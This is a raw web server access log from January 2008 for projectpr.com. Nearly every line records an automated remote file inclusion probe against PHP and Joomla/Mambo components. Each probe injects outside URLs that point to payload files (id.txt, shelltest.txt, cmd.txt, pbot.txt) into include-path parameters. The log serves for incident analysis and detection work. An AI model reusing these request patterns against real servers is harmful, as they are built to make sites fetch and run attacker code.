89.149.208.203 - - [12/Jan/2008:14:55:49 -0800] "GET /logs/classifieds/config.inc.php?path_escape=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
65.74.150.192 - - [12/Jan/2008:14:56:20 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
65.74.150.192 - - [12/Jan/2008:14:56:20 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:14:56:44 -0800] "GET /logs/access_070812.log/!rfihttp://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:14:56:44 -0800] "GET /!rfihttp://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:14:56:45 -0800] "GET /logs/!rfihttp://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.232.23.237 - - [12/Jan/2008:14:56:49 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.225.219.10 - - [12/Jan/2008:14:58:13 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.projectpr.com"
66.225.219.10 - - [12/Jan/2008:14:58:13 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.projectpr.com"
210.188.218.110 - - [12/Jan/2008:14:58:25 -0800] "GET /logs/access_070912.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
210.188.218.110 - - [12/Jan/2008:14:58:25 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
210.188.218.110 - - [12/Jan/2008:14:58:25 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
212.88.135.59 - - [12/Jan/2008:14:58:44 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.glur.de//.asd/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.projectpr.com"
212.88.135.59 - - [12/Jan/2008:14:58:44 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.glur.de//.asd/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:14:58:45 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:14:59:10 -0800] "GET /!rfihttp://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
195.62.12.248 - - [12/Jan/2008:15:00:12 -0800] "GET /logs/access.log//components/com_smf/smf.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.12.248 - - [12/Jan/2008:15:00:12 -0800] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.12.248 - - [12/Jan/2008:15:00:13 -0800] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
66.249.19.17 - - [12/Jan/2008:15:00:34 -0800] "GET /start.php?id=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.808" "www.projectpr.com"
74.52.9.218 - - [12/Jan/2008:15:00:40 -0800] "GET /http://somletterobin.free.fr/myspeach/shelltest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.projectpr.com"
74.52.9.218 - - [12/Jan/2008:15:00:41 -0800] "GET /logs/http://somletterobin.free.fr/myspeach/shelltest.txt??? HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:15:01:18 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:15:01:26 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.200.83.90 - - [12/Jan/2008:15:01:55 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.projectpr.com"
74.200.83.90 - - [12/Jan/2008:15:01:55 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:15:02:54 -0800] "GET /logs/access_070812.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:15:02:54 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:15:02:54 -0800] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.187.94 - - [12/Jan/2008:15:03:59 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fordtransit.org.uk//skins/gate_to_americana/.debug/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.187.94 - - [12/Jan/2008:15:03:59 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fordtransit.org.uk//skins/gate_to_americana/.debug/contr.txt? HTTP/1.1" 404 289 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.187.94 - - [12/Jan/2008:15:03:59 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fordtransit.org.uk//skins/gate_to_americana/.debug/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.52.9.218 - - [12/Jan/2008:15:05:44 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://somletterobin.free.fr/myspeach/shelltest.txt??? HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.projectpr.com"
74.52.9.218 - - [12/Jan/2008:15:05:44 -0800] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://somletterobin.free.fr/myspeach/shelltest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.projectpr.com"
72.232.23.237 - - [12/Jan/2008:15:06:09 -0800] "GET /logs/access_070912.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
146.83.144.170 - - [12/Jan/2008:15:06:17 -0800] "GET /logs/access.log//?mosConfig_live_site=http://ebbw.net/components/com_magazine/layouts/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
146.83.144.170 - - [12/Jan/2008:15:06:18 -0800] "GET //?mosConfig_live_site=http://ebbw.net/components/com_magazine/layouts/id.txt? HTTP/1.1" 200 9521 "-" "libwww-perl/5.805" "www.projectpr.com"
146.83.144.170 - - [12/Jan/2008:15:06:19 -0800] "GET /logs//?mosConfig_live_site=http://ebbw.net/components/com_magazine/layouts/id.txt? HTTP/1.1" 200 4518 "-" "libwww-perl/5.805" "www.projectpr.com"
209.216.249.194 - - [12/Jan/2008:15:07:53 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fordtransit.org.uk//skins/gate_to_americana/.debug/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.216.249.194 - - [12/Jan/2008:15:07:53 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fordtransit.org.uk//skins/gate_to_americana/.debug/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.216.249.194 - - [12/Jan/2008:15:07:53 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fordtransit.org.uk//skins/gate_to_americana/.debug/contr.txt? HTTP/1.1" 404 294 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:15:08:54 -0800] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:15:08:56 -0800] "GET /logs/access_070812.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:15:08:57 -0800] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:15:08:57 -0800] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.53.58.15 - - [12/Jan/2008:15:10:28 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://seucu.us/pbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.53.58.15 - - [12/Jan/2008:15:10:29 -0800] "GET //skin/zero_vote/error.php?dir=http://seucu.us/pbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.53.58.15 - - [12/Jan/2008:15:10:29 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://seucu.us/pbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.225.219.10 - - [12/Jan/2008:15:11:54 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.projectpr.com"
66.225.219.10 - - [12/Jan/2008:15:11:55 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:15:13:43 -0800] "GET /logs/access_070812.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:15:13:43 -0800] "GET /logs/access_070812.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:15:13:43 -0800] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:15:13:43 -0800] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.249.19.17 - - [12/Jan/2008:15:15:34 -0800] "GET /logs/access_070812.log/start.php?id=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.808" "www.projectpr.com"
66.249.19.17 - - [12/Jan/2008:15:15:34 -0800] "GET /logs/start.php?id=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:15:18:17 -0800] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:15:18:22 -0800] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.53.229.194 - - [12/Jan/2008:15:20:19 -0800] "GET //skin/zero_vote/error.php?dir=http://boringtime.com/banget?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
82.192.68.20 - - [12/Jan/2008:15:20:43 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt? HTTP/1.1" 404 305 "-" "libwww-perl/5.79" "www.projectpr.com"
82.192.68.20 - - [12/Jan/2008:15:20:43 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
82.192.68.20 - - [12/Jan/2008:15:20:44 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
74.52.9.218 - - [12/Jan/2008:15:22:45 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://somletterobin.free.fr/myspeach/shelltest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.projectpr.com"
74.52.9.218 - - [12/Jan/2008:15:22:45 -0800] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://somletterobin.free.fr/myspeach/shelltest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.projectpr.com"
70.86.44.186 - - [12/Jan/2008:15:26:04 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.geocities.com/mobileuser.02473235/dew/index.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:15:30:39 -0800] "GET /logs/access_070812.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:15:30:39 -0800] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:15:31:05 -0800] "GET /logs/access_070812.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.251.180 - - [12/Jan/2008:15:31:05 -0800] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.52.9.218 - - [12/Jan/2008:15:34:30 -0800] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://somletterobin.free.fr/myspeach/shelltest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.projectpr.com"
74.52.9.218 - - [12/Jan/2008:15:34:30 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://somletterobin.free.fr/myspeach/shelltest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.projectpr.com"
216.246.61.117 - - [12/Jan/2008:15:36:30 -0800] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
81.169.157.91 - - [12/Jan/2008:15:36:45 -0800] "GET /logs/access_070812.log/addpost_newpoll.php?addpoll=preview&thispath=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
81.169.157.91 - - [12/Jan/2008:15:36:45 -0800] "GET /addpost_newpoll.php?addpoll=preview&thispath=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.69" "www.projectpr.com"
81.169.157.91 - - [12/Jan/2008:15:36:45 -0800] "GET /logs/addpost_newpoll.php?addpoll=preview&thispath=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
74.53.229.194 - - [12/Jan/2008:15:41:20 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://boringtime.com/banget?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.53.229.194 - - [12/Jan/2008:15:41:20 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://boringtime.com/banget?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
202.180.216.12 - - [12/Jan/2008:15:42:13 -0800] "GET /logs/access_070712.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
202.180.216.12 - - [12/Jan/2008:15:42:13 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
202.180.216.12 - - [12/Jan/2008:15:42:14 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
216.246.61.117 - - [12/Jan/2008:15:42:48 -0800] "GET /logs/access_070812.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
216.246.61.117 - - [12/Jan/2008:15:42:48 -0800] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
146.83.144.170 - - [12/Jan/2008:15:45:18 -0800] "GET /logs/access_071112.log//?mosConfig_live_site=http://ebbw.net/components/com_magazine/layouts/id.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.805" "www.projectpr.com"
200.55.216.70 - - [12/Jan/2008:15:50:05 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 305 "-" "libwww-perl/5.65" "www.projectpr.com"
200.55.216.70 - - [12/Jan/2008:15:56:46 -0800] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 321 "-" "libwww-perl/5.65" "www.projectpr.com"
200.55.216.70 - - [12/Jan/2008:15:56:51 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 305 "-" "libwww-perl/5.65" "www.projectpr.com"
200.55.216.70 - - [12/Jan/2008:15:57:00 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 310 "-" "libwww-perl/5.65" "www.projectpr.com"
82.120.231.1 - - [12/Jan/2008:16:19:49 -0800] "GET /logs/access.log HTTP/1.0" 200 470240 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.4.4" "www.projectpr.com"
219.94.145.104 - - [12/Jan/2008:16:22:37 -0800] "GET /logs/access_070812.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 337 "-" "libwww-perl/5.79" "www.projectpr.com"
219.94.145.104 - - [12/Jan/2008:16:22:37 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
219.94.145.104 - - [12/Jan/2008:16:22:38 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
74.6.26.141 - - [12/Jan/2008:16:28:54 -0800] "GET /navigation_bars/ HTTP/1.0" 200 807 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
208.36.144.9 - - [12/Jan/2008:16:31:03 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "projectpr.com"
75.0.141.110 - - [12/Jan/2008:16:31:43 -0800] "GET /logs/access_070812.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
75.0.141.110 - - [12/Jan/2008:16:31:44 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
75.0.141.110 - - [12/Jan/2008:16:31:44 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
85.12.50.119 - - [12/Jan/2008:16:35:37 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.projectpr.com"
85.12.50.119 - - [12/Jan/2008:16:35:37 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.projectpr.com"
85.17.3.183 - - [12/Jan/2008:16:36:06 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.17.3.183 - - [12/Jan/2008:16:36:06 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 305 "-" "libwww-perl/5.79" "www.projectpr.com"
85.17.3.183 - - [12/Jan/2008:16:36:06 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.17.3.183 - - [12/Jan/2008:16:36:06 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.17.3.183 - - [12/Jan/2008:16:36:06 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.17.3.183 - - [12/Jan/2008:16:36:06 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.17.3.183 - - [12/Jan/2008:16:36:06 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
